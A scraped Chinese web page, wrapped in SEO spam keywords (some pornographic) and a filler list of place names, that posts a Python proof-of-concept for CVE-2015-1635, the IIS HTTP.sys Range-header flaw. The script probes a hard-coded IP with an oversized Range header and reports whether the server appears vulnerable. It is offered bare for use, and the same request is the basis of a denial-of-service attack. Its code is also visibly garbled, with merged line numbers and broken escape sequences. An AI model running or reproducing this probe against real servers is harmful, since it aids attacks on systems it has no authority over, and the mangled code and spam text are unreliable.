国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 學(xué)院 > 開發(fā)設(shè)計 > 正文

cve-2015-1635poc

2019-11-14 17:16:15
字體:
供稿:網(wǎng)友
 1 import socket 2 import random 3 ipAddr = "10.1.89.20" 4 hexAllFfff = "18446744073709551615" 5 req1 = "GET / HTTP/1.0/r/n/r/n" 6 req = "GET / HTTP/1.1/r/nHost: stuff/r/nRange: bytes=0-" + hexAllFfff + "/r/n/r/n" 7 PRint("[*] Audit Started") 8 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 client_socket.connect((ipAddr, 80))10 client_socket.send(req1.encode())11 boringResp = client_socket.recv(1024).decode()12 if "Microsoft" not in boringResp:13                 print("[*] Not IIS")14                 exit(0)15 client_socket.close()16 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)17 client_socket.connect((ipAddr, 80))18 client_socket.send(req.encode())19 goodResp = client_socket.recv(1024).decode()20 if "Requested Range Not Satisfiable" in goodResp:21                 print("[!!] Looks VULN")22 elif " The request has an invalid header name" in goodResp:23                 print("[*] Looks Patched")24 else:25                 print("[*] Unexpected response, cannot discern patch status")
View Code

這個漏洞則這幾天也火了一把,poc附上。


發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 甘孜县| 基隆市| 高密市| 建阳市| 阜城县| 辉南县| 深圳市| 河曲县| 靖西县| 同仁县| 星子县| 化德县| 凤阳县| 昌宁县| 南川市| 玉林市| 铁岭市| 凯里市| 思南县| 濉溪县| 扎兰屯市| 隆安县| 南雄市| 海安县| 南华县| 镇雄县| 泽州县| 兴和县| 循化| 泰和县| 南溪县| 彭水| 和田县| 梁河县| 房产| 且末县| 苍南县| 大埔区| 北京市| 犍为县| 中西区|